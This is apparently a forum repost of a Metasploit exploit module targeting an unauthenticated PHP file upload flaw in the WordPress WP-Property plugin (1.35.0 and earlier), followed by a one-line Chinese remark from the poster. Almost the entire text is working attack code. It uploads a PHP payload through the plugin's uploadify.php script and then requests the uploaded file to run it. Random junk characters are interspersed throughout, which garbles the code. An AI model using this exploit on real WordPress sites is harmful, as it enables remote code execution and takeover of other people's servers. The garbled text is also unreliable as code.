WordPress WP-Property PHP 文件上传漏洞
v! r- q' V/ o/ u9 B! W9 v A# ]& J% }3 D1 b8 a$ D
## # This file is part of the Metasploit Framework and may be subject to
% T5 \) W/ c' {3 W. D
4 ]- j/ J8 p6 k" f8 C5 e# redistribution and commercial restrictions. Please see the Metasploit
+ H, }% g" x3 {
# s! ?) a' E/ _- T# Framework web site for more information on licensing and terms of use.
7 {' e; D ^ K( Z; L3 a
) A u" S- ]. H. z# http://metasploit.com/framework/ ##
: k2 k9 M1 G# {& Q
1 t6 X+ K7 Y* ]1 u! X 7 `" d1 ^) _! e( R! j5 K J
8 b. H) Y- r0 P) |* J0 N3 t5 A+ R 6 y( `! D: g& g$ Z$ v% `3 M" E. C* O
+ S* Z0 r$ I) t; |' |
require 'msf/core'
7 ~$ a6 a% {2 H- o; Urequire 'msf/core/exploit/php_exe'
; H' y* c; D3 ]" h# ?* H5 R
. h9 P% Y' `/ b& [class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit: hpEXE def initialize(info = {}) super(update_info(info, 'Name' => 'WordPress WP-Property PHP File Upload Vulnerability',$ }$ O0 I# E6 L2 B; i3 D; `
'Description' => %q{
4 ~$ y# ^$ Y c6 j4 PThis module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress plugin. By abusing the uploadify.php file, a malicious user can upload a file to a temp directory without authentication, which results in arbitrary code execution. }, 'Author' =>
1 r) [ l) z8 g; i9 H$ Z[* S0 A" f- p, Y' j+ s2 ]
'Sammy FORGIT', # initial discovery
/ c' s9 ^2 c; E9 h k4 B. h'James Fitts <fitts.james[at]gmail.com>' # metasploit module' M! F, d7 x( f3 [! q0 p, @
],! `9 e* k4 N% x2 f! l
'License' => MSF_LICENSE,! a0 A/ |6 b m/ V( Z( j1 D
'References' =>: ?) a: F* c" m2 L* w" K, q. u) h1 p
[5 S% M5 @% T, {0 I
[ 'OSVDB', '82656' ],' e& k5 y2 D4 w9 k' R0 a" U
[ 'BID', '53787' ],
: s& A+ Q" P! I" u9 D[ 'EDB', '18987'],- ]3 E' b) s& o( i4 Y
[ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]$ g' P5 {" S* ?% o
],
8 N/ G4 |. u5 g4 t& Z4 @1 L'Payload' =>
; w2 F. h ]- G{
0 `) O# m+ M' U8 ~! L5 K'BadChars' => "\x00",+ l! Q& E- ^, @1 H1 g( Y
},( i3 B$ {1 l: g# V9 J
'Platform' => 'php',
5 ?4 t5 f: s; g'Arch' => ARCH_PHP,
( S T3 J5 r/ W9 O$ r1 ^'Targets' =>
6 U: ]5 v ~" S* X7 n; ~+ M[2 V$ |4 g( N; S: G
[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],* X. q, q/ }& l7 z* S ^
[ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
2 o9 F" m. t! `4 A% Y2 I6 l],
) X5 k7 E) H% ]* r6 Q7 p2 g'DefaultTarget' => 0,
3 L U- g+ _! n) |& E9 ['DisclosureDate' => 'Mar 26 2012'))' @* a6 @( ]! a1 n. W' P
8 p V9 l5 [9 ^% Hregister_options(
[( U; ?7 q4 W7 y[$ P1 s9 J- K/ O; b( H
OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
6 L( T! [4 ~! l' E, r0 X: q4 m], self.class)
* m7 G) e m4 v& a: D, q. s2 yend
1 v# ]5 S( Q6 k) t3 w9 L7 x) t$ ~
def check
" r( I1 V" p( S- Q, N$ K( N, b buri = target_uri.path
- F: N- a, K) Uuri << '/' if uri[-1,1] != '/' res = send_request_cgi({ 'method' => 'GET',
/ r1 X6 }8 j* t$ m'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"3 P: [" k8 ]* n7 x8 y9 @
})
0 V8 ]# N% l* ^) X! X" o7 j) ?% x& {4 _" }7 m W. ~5 M( ?
if not res or res.code != 200
6 N6 Q b% Y3 ~" a7 ~return Exploit::CheckCode::Unknown) N9 \8 o E( K9 c( k. x% P) G
end
3 Z3 V" F( p, [# c& r* N; O) g; r Y- w% V
return Exploit::CheckCode::Appears
' B) G/ t K m5 _* eend
% ^( |* Z) c5 S. P) ^$ e4 v: r9 E
% w1 ~4 J# ~$ G, R8 N, V6 tdef exploit8 u$ P0 c2 U1 M! |" c
uri = target_uri.path$ O) ?8 L! m9 ?+ c5 p+ A) \4 w& k
uri << '/' if uri[-1,1] != '/' peer = "#{rhost}:#{rport}" @payload_name = "#{rand_text_alpha(5)}.php" php_payload = get_write_exec_payload(:unlink_self=>true)
+ o: d& u2 m# j0 P. k
! ^* G+ g6 u2 ?data = Rex::MIME::Message.new
g t! v( O! H# O j udata.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
7 I. h# w# u! o2 Y/ E3 fdata.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")
v' T% r) O$ a* ]post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')5 V9 D& [3 q o
* u# C$ ~, c* V+ v% S1 O+ \% Eprint_status("#{peer} - Uploading payload #{@payload_name}")
+ \, P3 \' |3 n( Y$ S' Tres = send_request_cgi({* r# O" _' Z) g
'method' => 'POST',
8 T5 p1 Z" ]7 E Y5 g2 @* v' l; G'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",7 Z* j4 o3 H8 \( S0 X6 c# D
'ctype' => "multipart/form-data; boundary=#{data.bound}",
" ?4 w. I6 A7 t& C0 C6 W'data' => post_data, E. n0 e2 N d0 ?
})8 H* G' b( Q: Z# U
1 @0 Q% O5 O$ M3 k1 n* a4 R
if not res or res.code != 200 or res.body !~ /#{@payload_name}/
+ d6 s, r h( B9 ~( ?fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")$ \" b! {: }. n
end
% F. b2 ~6 m5 D9 O( Y" a/ v( v5 ^' e# |2 b6 E& j4 R. r. m9 ^! [
upload_uri = res.body
! u& t6 C8 \# c- |& O/ X- }* l4 P! z1 w% {" I3 ?$ j$ i5 I
print_status("#{peer} - Executing payload #{@payload_name}")
, a f! j* N3 `9 y4 w6 [4 {res = send_request_raw({; E0 P5 A3 M8 |. M C
'uri' => upload_uri,. K: h2 a7 n0 k* d: K
'method' => 'GET'
) B- z5 m% v9 z# K1 T* M})
) _; _5 b& [. W- [end. ~1 x. L! k, L0 Z" \
end4 A* r2 m/ ^2 j9 P
3 l2 i8 ^6 N) b$ L+ |
不要问我这写的是什么 怎么利用 我是说msf.
) Z5 Z7 k# M0 R# x: S; m0 a7 Y5 G
. M z/ R q3 Y9 T$ o5 F |